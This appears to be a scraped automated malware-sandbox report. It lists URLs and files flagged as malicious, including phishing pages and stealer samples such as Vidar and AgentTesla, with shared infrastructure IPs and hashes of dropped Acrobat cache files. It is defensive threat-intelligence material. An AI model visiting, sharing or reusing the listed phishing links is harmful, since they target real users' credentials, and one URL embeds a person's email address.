                                                                                              https://lillian.ru.com/9?ai=xdGet hashmaliciousUnknownBrowse
                                                                                                faststone-capture_voLss-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                  https://microsoftonlineworking.pages.dev/#?email=YW5kcmV3X2hvbHRAdGFjLnZpYy5nb3YuYXU=Get hashmaliciousReCaptcha PhishBrowse
                                                                                                    https://www.sexpartnercommunity.com/?e7ak3e0m=57296397&tba4bck7=eyJpdiI6Imp1cHMxdGJERWI4SjBwNVYvSWdWeHc9PSIsInZhbHVlIjoiSGhGdTY1TlFyN1JJQm03UEJhZGZxQjV2NncyZ0JWajdJZnRWaWNBZlM2dzVxV05KdGx3TXZaaURxZzgraDNUYURDK2EwcFUra28rNEE2YTdRYWRhdFdwQkxaL09xeDRCVUt0Rm1IT3cxa3hPd1huM3FkN3NzNS9BYjEwV2hOY3dzblZ6TW1TaUdDeXBOTG9zc2FtU0VZKzhNeVgzS1FkTnE3WnA5NUZqWXJTQkVaNlN1UmUrZFFTUlZzZ05pbVlnIiwibWFjIjoiOTFjZDc5Y2FhNTBkNGYyYWYzZDRiYzhlYjljMjZmYTE1MzBhNGI2MmQ0NTFhYmYyZmVjN2IwMGUyNmFlNjU3MCIsInRhZyI6IiJ9&spaRoute=/livecams/all&trk=toza80hGet hashmaliciousUnknownBrowse
                                                                                                      https://www.google.fr/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Flink.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS0z6wG-1zBDHwJKvW2cHgWJTMQtr_VqZTDREew7RsDJjLX3Nu-hOB30y_dTACc_DC20WhJeWfQI9ldVnZg5I3l2FTVB0RS05hmGx0cQsdDkHpPzJaYyjKcdoY7HYeMLqArftV0YSw5Wm9JJrOI2mXih3-C4cj98VpbIH9I96jbo0VVbIhhGr8mn95Nnhq8dJiEDFZ2amN-vFP0KvhVNzd6bzdT0TFK8bA49IWUCbU9MGpR1lTLTQ8wGn4FQOGHcxbAFQg5aCXIk9dUPzquvqJ8d/4a7/BVRt3igITgKfI8bq35Ml_w/h94/h001.jQSqGb0rCzLfgHVmmxaOCxarjpgyicdCc0Ov4XzL60wGet hashmaliciousUnknownBrowse
                                                                                                        151.101.66.137http://novo.oratoriomariano.com/novo/Get hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-3.3.1.min.js
                                                                                                        http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-1.7.min.js
                                                                                                        http://site9615380.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-1.7.2.min.js
                                                                                                        http://grandprairie-water-damage-restoration.comGet hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-3.3.1.min.js
                                                                                                        2023121142000021ki01kvjs.htmlGet hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-latest.min.js
                                                                                                        151.101.130.137http://mi-outlook-loggin.click/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-1.11.3.min.js
                                                                                                        http://imaps-support.us/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-1.11.3.min.js
                                                                                                        http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-1.7.min.js
                                                                                                        https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AING.shalominternationalministry.com/index.xml%23?email=amFtZXMubGVhZGJlYXRlckBsb2dpY2FsaXMuY29tGet hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-3.3.1.min.js
                                                                                                        http://site9613885.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-1.7.2.min.js
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        cdnjs.cloudflare.comhttps://app.collabow.io/d/GNgkdZO5gKluqEP3mMdbEwzWbgEyOeRe8sIh64SLMvsNGet hashmaliciousUnknownBrowse
                                                                                                        • 104.17.25.14
                                                                                                        AHCHICSvjmApRFFQmAQXRyNbw.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 104.17.24.14
                                                                                                        http://wiki.hostmaster.chinametrogroup.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 104.17.25.14
                                                                                                        UwBqqeMnswLwstaa.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 104.17.25.14
                                                                                                        CHDLSHtWbSRCfzJMtDO.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 104.17.24.14
                                                                                                        https://iasitvlife.roGet hashmaliciousUnknownBrowse
                                                                                                        • 104.17.25.14
                                                                                                        https://iasitvlife.ro/stiri/local/a-sunat-la-call-center-anticoruptie-si-a-denuntat-un-functionar-public/Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 104.17.24.14
                                                                                                        http://185.95.84.78/rd/4gmsyP17223JZmx332lihotmtcwn9842ZSCGIOAIIATLJCU85240TITV3606d9Get hashmaliciousPhisherBrowse
                                                                                                        • 104.17.24.14
                                                                                                        PRODUCTTS SPECIFICATIONS.shtmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 104.17.24.14
                                                                                                        http://masdeliveryusa.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 104.17.25.14
                                                                                                        bg.microsoft.map.fastly.nethttps://hblitigation-news.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 199.232.214.172
                                                                                                        http://url5892.equipgreen.com/ls/click?upn=u001.QnVyUTRnA6m7Ys04OcfRK-2BmYDxK-2BPvo2SH4SnTHtM2ahAlVLCP5CpZxqdikPch52bwE-2B6FGVTHUfa6r6g-2FUXtg-3D-3DRRNj_h5tndX3XP82u2CVP7HmVo4t-2FDkgNbuc-2FvPQxBNjqhqQfNFsb7fTdfgoFOkzI-2Bxa5KYPUiZS4W-2FgvgYDkntJEAhmsWMOHAu7qmcDzwEsnQtseb3y8TmhK-2BeBLagbYZa-2Fl5PaNGlzycBP9wt-2Bx-2BIF8M6H7XNSfHFanKHmI0XclVmtDLdFtwBZAykMNol-2B1EVQFYL6mFcaqBDNwcneuaiLfRiDR-2FpEOaIMkXlnRLaWty4mFpZlGkJkD2RATf5aYVpVmITUImq0A03rBAVtkq8oTcm0pf7AnRvvjfggEzQM-2FBDJTgvat7iExDFu-2FC1T1blavXJCuw6WT3ULqe7EEFzwLpISA11fryJZChsjBogHU4mmljbR7myqEHYvHOs-2BwDsboMOlR8BgyLszRlTVGoHnspaKXf-2BkOLcDw7PJIrD7-2FlwFq18AGU-2BMCwieNwipGZ43aaplrmL164T9c9GFx1PNH2NTQ8QQdXqSUL2c6Z6-2B1ninN2347XsTbH1kOcG-2Baj-2BmKRd-2BNrQ8HjKbgibY3if2Dc-2FillftKg-2BOAfAsCUg0buauclIIXkY9pJgbAiU0QED9OnFbExZCCtlYAvJNOed7N4zn56A55lVm-2FpSqvOehGwGBaKqQa4ttNoFB-2BYOeC0wYp71SC66lbF9C6FtGbF3Qpgus3-2BPuAKrmA6O2Su9CLsGxY9NfltTk4RJkxZjzDErPRMi6bSkxScSDRk90tJqNxYpDyXtYZlskKpQ4HdVrTPlGs8-2B-2FHPDDSgN-2BZxT1dhGovf81VbcvTPC13GKhBBaLTvYpomEVB24raM-2Fz7Xk5U-2B8zKTebMlP-2B767ISJjSJ4FsIMohGUw1oYLuomExXvt4SjzjZbOP9qyB9S-2BEqd7x6PZREvV2dm-2BJKbb6DwZmKWxW1lJB4QpPTNqpO9GdNhkZb7A-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                        • 199.232.214.172
                                                                                                        https://indexconectada.net.br/Get hashmaliciousUnknownBrowse
                                                                                                        • 199.232.214.172
                                                                                                        https://www.oferdigitaiscom.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 199.232.214.172
                                                                                                        https://extensivetraders.org/Get hashmaliciousUnknownBrowse
                                                                                                        • 199.232.210.172
                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                        • 199.232.214.172
                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                        • 199.232.214.172
                                                                                                        xrg1n1qfD2.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 199.232.210.172
                                                                                                        http://google.comGet hashmaliciousUnknownBrowse
                                                                                                        • 199.232.210.172
                                                                                                        https://new-doctor-booking-php-mysql.filemakrxpert.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 199.232.210.172
                                                                                                        code.jquery.comhttps://www.thefirsthbcu.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.2.137
                                                                                                        PRODUCTTS SPECIFICATIONS.shtmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.194.137
                                                                                                        https://link.edgepilot.com/s/527f3b22/IsEZW0vVpU28AdY1bja1GQ?u=https://securemail.wf.com/s/e?m=ABDLG7Db88ZOC03NJzhZQA0p%26c=ABCnBKdwqhBBe4jHrIQNGJMjGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.2.137
                                                                                                        http://masdeliveryusa.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.194.137
                                                                                                        https://www.google.fr/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Flink.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS0z6wG-1zBDHwJKvW2cHgWJTMQtr_VqZTDREew7RsDJjLX3Nu-hOB30y_dTACc_DC20WhJeWfQI9ldVnZg5I3l2FTVB0RS05hmGx0cQsdDkHpPzJaYyjKcdoY7HYeMLqArftV0YSw5Wm9JJrOI2mXih3-C4cj98VpbIH9I96jbo0VVbIhhGr8mn95Nnhq8dJiEDFZ2amN-vFP0KvhVNzd6bzdT0TFK8bA49IWUCbU9MGpR1lTLTQ8wGn4FQOGHcxbAFQg5aCXIk9dUPzquvqJ8d/4a7/BVRt3igITgKfI8bq35Ml_w/h94/h001.jQSqGb0rCzLfgHVmmxaOCxarjpgyicdCc0Ov4XzL60wGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.66.137
                                                                                                        https://www.ccjm.org/highwire_log/share/mendeley?link=https://onpro.infoGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.66.137
                                                                                                        https://www.calameo.com/read/0077804248b46bb5a7c19Get hashmaliciousHtmlDropperBrowse
                                                                                                        • 151.101.66.137
                                                                                                        https://links.truthsocial.com/link/113203933939427541Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.66.137
                                                                                                        Notaire-document.htmlGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.66.137
                                                                                                        voicemaiVOIP_1002202474911222280000000082autoresponse.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.130.137
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        TWIDC-AS-APTWIDCLimitedHKhttp://www.3659vip4.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 103.155.16.134
                                                                                                        https://aa.3657hvd.cc/Get hashmaliciousUnknownBrowse
                                                                                                        • 103.155.16.134
                                                                                                        http://www.bet3656001.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 103.155.16.134
                                                                                                        http://www.365365fa.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 103.155.16.134
                                                                                                        http://wap.theblmediagroup.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 103.155.16.134
                                                                                                        http://ww-p365.cc/Get hashmaliciousUnknownBrowse
                                                                                                        • 103.155.16.134
                                                                                                        http://365okzb.cc/Get hashmaliciousUnknownBrowse
                                                                                                        • 103.155.16.134
                                                                                                        http://www.ysb238.cc/Get hashmaliciousUnknownBrowse
                                                                                                        • 103.155.16.134
                                                                                                        http://3656gg.vip/Get hashmaliciousUnknownBrowse
                                                                                                        • 103.155.16.134
                                                                                                        http://3656.915sj1.xyz/Get hashmaliciousUnknownBrowse
                                                                                                        • 103.155.16.134
                                                                                                        FASTLYUShttps://jhansalazar.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.193.229
                                                                                                        https://test1web.edukati2.websku.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.193.229
                                                                                                        http://url5892.equipgreen.com/ls/click?upn=u001.QnVyUTRnA6m7Ys04OcfRK-2BmYDxK-2BPvo2SH4SnTHtM2ahAlVLCP5CpZxqdikPch52bwE-2B6FGVTHUfa6r6g-2FUXtg-3D-3DRRNj_h5tndX3XP82u2CVP7HmVo4t-2FDkgNbuc-2FvPQxBNjqhqQfNFsb7fTdfgoFOkzI-2Bxa5KYPUiZS4W-2FgvgYDkntJEAhmsWMOHAu7qmcDzwEsnQtseb3y8TmhK-2BeBLagbYZa-2Fl5PaNGlzycBP9wt-2Bx-2BIF8M6H7XNSfHFanKHmI0XclVmtDLdFtwBZAykMNol-2B1EVQFYL6mFcaqBDNwcneuaiLfRiDR-2FpEOaIMkXlnRLaWty4mFpZlGkJkD2RATf5aYVpVmITUImq0A03rBAVtkq8oTcm0pf7AnRvvjfggEzQM-2FBDJTgvat7iExDFu-2FC1T1blavXJCuw6WT3ULqe7EEFzwLpISA11fryJZChsjBogHU4mmljbR7myqEHYvHOs-2BwDsboMOlR8BgyLszRlTVGoHnspaKXf-2BkOLcDw7PJIrD7-2FlwFq18AGU-2BMCwieNwipGZ43aaplrmL164T9c9GFx1PNH2NTQ8QQdXqSUL2c6Z6-2B1ninN2347XsTbH1kOcG-2Baj-2BmKRd-2BNrQ8HjKbgibY3if2Dc-2FillftKg-2BOAfAsCUg0buauclIIXkY9pJgbAiU0QED9OnFbExZCCtlYAvJNOed7N4zn56A55lVm-2FpSqvOehGwGBaKqQa4ttNoFB-2BYOeC0wYp71SC66lbF9C6FtGbF3Qpgus3-2BPuAKrmA6O2Su9CLsGxY9NfltTk4RJkxZjzDErPRMi6bSkxScSDRk90tJqNxYpDyXtYZlskKpQ4HdVrTPlGs8-2B-2FHPDDSgN-2BZxT1dhGovf81VbcvTPC13GKhBBaLTvYpomEVB24raM-2Fz7Xk5U-2B8zKTebMlP-2B767ISJjSJ4FsIMohGUw1oYLuomExXvt4SjzjZbOP9qyB9S-2BEqd7x6PZREvV2dm-2BJKbb6DwZmKWxW1lJB4QpPTNqpO9GdNhkZb7A-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.2.188
                                                                                                        https://app.collabow.io/d/GNgkdZO5gKluqEP3mMdbEwzWbgEyOeRe8sIh64SLMvsNGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.65.229
                                                                                                        https://www.oferdigitaiscom.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.0.176
                                                                                                        c42oX67S73.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.193.73
                                                                                                        AHCHICSvjmApRFFQmAQXRyNbw.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.129.140
                                                                                                        https://www.thefirsthbcu.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.2.137
                                                                                                        UwBqqeMnswLwstaa.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.65.187
                                                                                                        CHDLSHtWbSRCfzJMtDO.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.64.84
                                                                                                        CLOUDFLARENETUShttps://jhansalazar.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 104.18.36.155
                                                                                                        msvcp110.dllGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.208.181
                                                                                                        https://hblitigation-news.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 104.16.117.116
                                                                                                        https://www.google.com/url?sa=t&url=https%3A%2F%2F%6d%6f%73%63%76%61%64%75%6d%61%2e%70%72%6f%2F&usg=AOvVaw0d8WU-1rxjmcdGQTa3JxQL&opi=Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 104.21.2.159
                                                                                                        http://ipscanadvsf.comGet hashmaliciousUnknownBrowse
                                                                                                        • 104.18.11.207
                                                                                                        https://www.ceolaser.com.mxGet hashmaliciousUnknownBrowse
                                                                                                        • 104.18.86.42
                                                                                                        QUOTATIONS#08673.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 104.26.13.205
                                                                                                        https://test1web.edukati2.websku.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 104.18.86.42
                                                                                                        http://url5892.equipgreen.com/ls/click?upn=u001.QnVyUTRnA6m7Ys04OcfRK-2BmYDxK-2BPvo2SH4SnTHtM2ahAlVLCP5CpZxqdikPch52bwE-2B6FGVTHUfa6r6g-2FUXtg-3D-3DRRNj_h5tndX3XP82u2CVP7HmVo4t-2FDkgNbuc-2FvPQxBNjqhqQfNFsb7fTdfgoFOkzI-2Bxa5KYPUiZS4W-2FgvgYDkntJEAhmsWMOHAu7qmcDzwEsnQtseb3y8TmhK-2BeBLagbYZa-2Fl5PaNGlzycBP9wt-2Bx-2BIF8M6H7XNSfHFanKHmI0XclVmtDLdFtwBZAykMNol-2B1EVQFYL6mFcaqBDNwcneuaiLfRiDR-2FpEOaIMkXlnRLaWty4mFpZlGkJkD2RATf5aYVpVmITUImq0A03rBAVtkq8oTcm0pf7AnRvvjfggEzQM-2FBDJTgvat7iExDFu-2FC1T1blavXJCuw6WT3ULqe7EEFzwLpISA11fryJZChsjBogHU4mmljbR7myqEHYvHOs-2BwDsboMOlR8BgyLszRlTVGoHnspaKXf-2BkOLcDw7PJIrD7-2FlwFq18AGU-2BMCwieNwipGZ43aaplrmL164T9c9GFx1PNH2NTQ8QQdXqSUL2c6Z6-2B1ninN2347XsTbH1kOcG-2Baj-2BmKRd-2BNrQ8HjKbgibY3if2Dc-2FillftKg-2BOAfAsCUg0buauclIIXkY9pJgbAiU0QED9OnFbExZCCtlYAvJNOed7N4zn56A55lVm-2FpSqvOehGwGBaKqQa4ttNoFB-2BYOeC0wYp71SC66lbF9C6FtGbF3Qpgus3-2BPuAKrmA6O2Su9CLsGxY9NfltTk4RJkxZjzDErPRMi6bSkxScSDRk90tJqNxYpDyXtYZlskKpQ4HdVrTPlGs8-2B-2FHPDDSgN-2BZxT1dhGovf81VbcvTPC13GKhBBaLTvYpomEVB24raM-2Fz7Xk5U-2B8zKTebMlP-2B767ISJjSJ4FsIMohGUw1oYLuomExXvt4SjzjZbOP9qyB9S-2BEqd7x6PZREvV2dm-2BJKbb6DwZmKWxW1lJB4QpPTNqpO9GdNhkZb7A-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                        • 104.18.161.117
                                                                                                        https://indexconectada.net.br/Get hashmaliciousUnknownBrowse
                                                                                                        • 188.114.96.3
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        28a2c9bd18a11de089ef85a160da29e4263528293882.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 20.190.159.75
                                                                                                        • 20.12.23.50
                                                                                                        https://jhansalazar.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 20.190.159.75
                                                                                                        • 20.12.23.50
                                                                                                        https://hblitigation-news.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 20.190.159.75
                                                                                                        • 20.12.23.50
                                                                                                        https://www.google.com/url?sa=t&url=https%3A%2F%2F%6d%6f%73%63%76%61%64%75%6d%61%2e%70%72%6f%2F&usg=AOvVaw0d8WU-1rxjmcdGQTa3JxQL&opi=Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 20.190.159.75
                                                                                                        • 20.12.23.50
                                                                                                        https://www.ceolaser.com.mxGet hashmaliciousUnknownBrowse
                                                                                                        • 20.190.159.75
                                                                                                        • 20.12.23.50
                                                                                                        https://test1web.edukati2.websku.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 20.190.159.75
                                                                                                        • 20.12.23.50
                                                                                                        http://url5892.equipgreen.com/ls/click?upn=u001.QnVyUTRnA6m7Ys04OcfRK-2BmYDxK-2BPvo2SH4SnTHtM2ahAlVLCP5CpZxqdikPch52bwE-2B6FGVTHUfa6r6g-2FUXtg-3D-3DRRNj_h5tndX3XP82u2CVP7HmVo4t-2FDkgNbuc-2FvPQxBNjqhqQfNFsb7fTdfgoFOkzI-2Bxa5KYPUiZS4W-2FgvgYDkntJEAhmsWMOHAu7qmcDzwEsnQtseb3y8TmhK-2BeBLagbYZa-2Fl5PaNGlzycBP9wt-2Bx-2BIF8M6H7XNSfHFanKHmI0XclVmtDLdFtwBZAykMNol-2B1EVQFYL6mFcaqBDNwcneuaiLfRiDR-2FpEOaIMkXlnRLaWty4mFpZlGkJkD2RATf5aYVpVmITUImq0A03rBAVtkq8oTcm0pf7AnRvvjfggEzQM-2FBDJTgvat7iExDFu-2FC1T1blavXJCuw6WT3ULqe7EEFzwLpISA11fryJZChsjBogHU4mmljbR7myqEHYvHOs-2BwDsboMOlR8BgyLszRlTVGoHnspaKXf-2BkOLcDw7PJIrD7-2FlwFq18AGU-2BMCwieNwipGZ43aaplrmL164T9c9GFx1PNH2NTQ8QQdXqSUL2c6Z6-2B1ninN2347XsTbH1kOcG-2Baj-2BmKRd-2BNrQ8HjKbgibY3if2Dc-2FillftKg-2BOAfAsCUg0buauclIIXkY9pJgbAiU0QED9OnFbExZCCtlYAvJNOed7N4zn56A55lVm-2FpSqvOehGwGBaKqQa4ttNoFB-2BYOeC0wYp71SC66lbF9C6FtGbF3Qpgus3-2BPuAKrmA6O2Su9CLsGxY9NfltTk4RJkxZjzDErPRMi6bSkxScSDRk90tJqNxYpDyXtYZlskKpQ4HdVrTPlGs8-2B-2FHPDDSgN-2BZxT1dhGovf81VbcvTPC13GKhBBaLTvYpomEVB24raM-2Fz7Xk5U-2B8zKTebMlP-2B767ISJjSJ4FsIMohGUw1oYLuomExXvt4SjzjZbOP9qyB9S-2BEqd7x6PZREvV2dm-2BJKbb6DwZmKWxW1lJB4QpPTNqpO9GdNhkZb7A-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                        • 20.190.159.75
                                                                                                        • 20.12.23.50
                                                                                                        https://indexconectada.net.br/Get hashmaliciousUnknownBrowse
                                                                                                        • 20.190.159.75
                                                                                                        • 20.12.23.50
                                                                                                        https://app.collabow.io/d/GNgkdZO5gKluqEP3mMdbEwzWbgEyOeRe8sIh64SLMvsNGet hashmaliciousUnknownBrowse
                                                                                                        • 20.190.159.75
                                                                                                        • 20.12.23.50
                                                                                                        https://www.oferdigitaiscom.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 20.190.159.75
                                                                                                        • 20.12.23.50
                                                                                                        6271f898ce5be7dd52b0fc260d0662b3c42oX67S73.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 2.23.209.161
                                                                                                        PO20241003.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 2.23.209.161
                                                                                                        https://ahchoadeegu.homes?u=k8pp605&o=c9ewtnr&t=8845Get hashmaliciousUnknownBrowse
                                                                                                        • 2.23.209.161
                                                                                                        QT2Q1292300924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                        • 2.23.209.161
                                                                                                        DHL Receipt_AWB 9892671327.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 2.23.209.161
                                                                                                        Payment proof.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 2.23.209.161
                                                                                                        MVR-00876 CARRARO ITALIA SPA.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 2.23.209.161
                                                                                                        4DC70000.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 2.23.209.161
                                                                                                        http://fpnc.vnvrff.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 2.23.209.161
                                                                                                        https://ca.docusign.net/Signing/EmailStart.aspx?a=ef028e9a-a228-415f-bf68-f187538d8e48&etti=24&acct=5c5d7412-9cb5-4dbf-8a78-52c1b2a30ce5&er=96c6e932-7bdc-4ccf-8eb1-c3c23bac63dcGet hashmaliciousUnknownBrowse
                                                                                                        • 2.23.209.161
                                                                                                        No context
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):290
                                                                                                        Entropy (8bit):5.195753294006736
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:QXPQ+q2PRN2nKuAl9OmbnIFUt8HXyQgZmw+HXyQQVkwORN2nKuAl9OmbjLJ:QXPVvaHAahFUt8HXBg/+HXBI5JHAaSJ
                                                                                                        MD5:80CAECC42FC4DEC55FF92071DC3E57A1
                                                                                                        SHA1:9AA3B330F6D9635115BA276974BFF6BE42CC5DDB
                                                                                                        SHA-256:5C009460B172E225CF28754C9D93621207F20E1B643E9C79A17DCF7080267DB8
                                                                                                        SHA-512:64EA055A57E14ADD5BE842174EF3E1029BAEA4C6A4A2DE17FDFCB13026A3E7EB6E02AC254B8C604A26292BE15C5A154A7116D76577C1545FDD9A9059AF6EFD1B
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:2024/10/04-09:11:11.536 1bf8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/10/04-09:11:11.538 1bf8 Recovering log #3.2024/10/04-09:11:11.538 1bf8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):290
                                                                                                        Entropy (8bit):5.195753294006736
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:QXPQ+q2PRN2nKuAl9OmbnIFUt8HXyQgZmw+HXyQQVkwORN2nKuAl9OmbjLJ:QXPVvaHAahFUt8HXBg/+HXBI5JHAaSJ
                                                                                                        MD5:80CAECC42FC4DEC55FF92071DC3E57A1
                                                                                                        SHA1:9AA3B330F6D9635115BA276974BFF6BE42CC5DDB
                                                                                                        SHA-256:5C009460B172E225CF28754C9D93621207F20E1B643E9C79A17DCF7080267DB8
                                                                                                        SHA-512:64EA055A57E14ADD5BE842174EF3E1029BAEA4C6A4A2DE17FDFCB13026A3E7EB6E02AC254B8C604A26292BE15C5A154A7116D76577C1545FDD9A9059AF6EFD1B
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:2024/10/04-09:11:11.536 1bf8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/10/04-09:11:11.538 1bf8 Recovering log #3.2024/10/04-09:11:11.538 1bf8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):331
                                                                                                        Entropy (8bit):5.1281521177380895
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:QXwt+q2PRN2nKuAl9Ombzo2jMGIFUt8HXYQ5Zmw+HXDI39VkwORN2nKuAl9Ombzz:QX5vaHAa8uFUt8HXYQ5/+HXg5JHAa8RJ
                                                                                                        MD5:C3152A060E8030B84F2CD63479D15FEB
                                                                                                        SHA1:2DE875332F6870FAA2386CB5440B9D7974EAE0F8
                                                                                                        SHA-256:C5DB5CCE54298A04D7F33DD6813EBBFB9D7C97C5256691A75C291FA2BE9D98E8
                                                                                                        SHA-512:93B2739B318E492D66763712D753D8E51ACA2B1A7B75EC4F809E6FD2C786DB03D7C8C1C5764DCF9E3998DF0E70F71DAFD5A95CFD949167A6597595588A28B70D
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:2024/10/04-09:11:11.446 2e8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/10/04-09:11:11.450 2e8 Recovering log #3.2024/10/04-09:11:11.451 2e8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):331
                                                                                                        Entropy (8bit):5.1281521177380895
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:QXwt+q2PRN2nKuAl9Ombzo2jMGIFUt8HXYQ5Zmw+HXDI39VkwORN2nKuAl9Ombzz:QX5vaHAa8uFUt8HXYQ5/+HXg5JHAa8RJ
                                                                                                        MD5:C3152A060E8030B84F2CD63479D15FEB
                                                                                                        SHA1:2DE875332F6870FAA2386CB5440B9D7974EAE0F8
